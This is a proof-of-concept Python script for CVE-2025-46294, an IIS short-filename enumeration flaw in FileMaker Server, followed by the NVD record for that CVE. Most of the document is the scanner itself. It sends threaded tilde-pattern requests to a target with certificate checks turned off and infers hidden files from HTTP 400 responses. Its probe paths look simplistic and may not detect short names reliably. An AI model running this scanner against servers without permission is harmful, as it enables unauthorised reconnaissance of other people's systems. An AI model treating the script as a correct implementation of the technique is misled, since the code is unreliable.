CVE-2025-46294

#!/usr/bin/env python3 # CVE-2025-46294 IIS Short Name Enumeration PoC # Target: FileMaker Server with IIS import requests import sys from concurrent.futures import ThreadPoolExecutor def check_shortname(target_url, suffix): """Check if a short filename exists by testing ~suffix pattern""" paths_to_test = [ f"/~{suffix}", f"/~{suffix}.as*", f"/~{suffix}.ht*", f"/~{suffix}.co*" ] for path in paths_to_test: try: url = f"{target_url.rstrip('/')}{path}" response = requests.get(url, timeout=5, verify=False) # If status is 400 Bad Request, short name exists # If status is 404 Not Found, short name doesn't exist if response.status_code == 400: return {'suffix': suffix, 'path': path, 'exists': True} elif response.status_code == 404: continue except requests.RequestException: continue return {'suffix': suffix, 'path': None, 'exists': False} def enumerate_shortnames(target_url, max_suffix=20, threads=10): """Enumerate potential short filenames""" print(f"[*] Starting IIS shortname enumeration on {target_url}") print(f"[*] Testing suffixes 0-{max_suffix} with {threads} threads\n") results = [] with ThreadPoolExecutor(max_workers=threads) as executor: futures = [executor.submit(check_shortname, target_url, i) for i in range(max_suffix + 1)] for future in futures: result = future.result() if result['exists']: results.append(result) print(f"[+] Found potential file/directory: ~{result['suffix']}") print(f"\n[*] Enumeration complete. Found {len(results)} potential targets.") return results if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-46294_poc.py <target_url>") print("Example: python cve-2025-46294_poc.py http://filemaker-server/") sys.exit(1) target = sys.argv[1] enumerate_shortnames(target)

{"cve": {"id": "CVE-2025-46294", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:12.360", "lastModified": "2025-12-23T14:44:32.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "To enhance security, the FileMaker Server 22.0.4 installer now includes an option to disable IIS short filename enumeration by setting NtfsDisable8dot3NameCreation in the Windows registry. This prevents attackers from using the tilde character to discover hidden files and directories. This vulnerability has been fully addressed in FileMaker Server 22.0.4. The IIS Shortname Vulnerability exploits how Microsoft IIS handles legacy 8.3 short filenames, allowing attackers to infer the existence of files or directories by crafting requests with the tilde (~) character."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:claris:filemaker_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "22.0.4", "matchCriteriaId": "72210F6C-78D0-449C-BD0A-A175305D1F3B"}]}]}], "references": [{"url": "https://support.claris.com/s/answerview?anum=000048450&language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}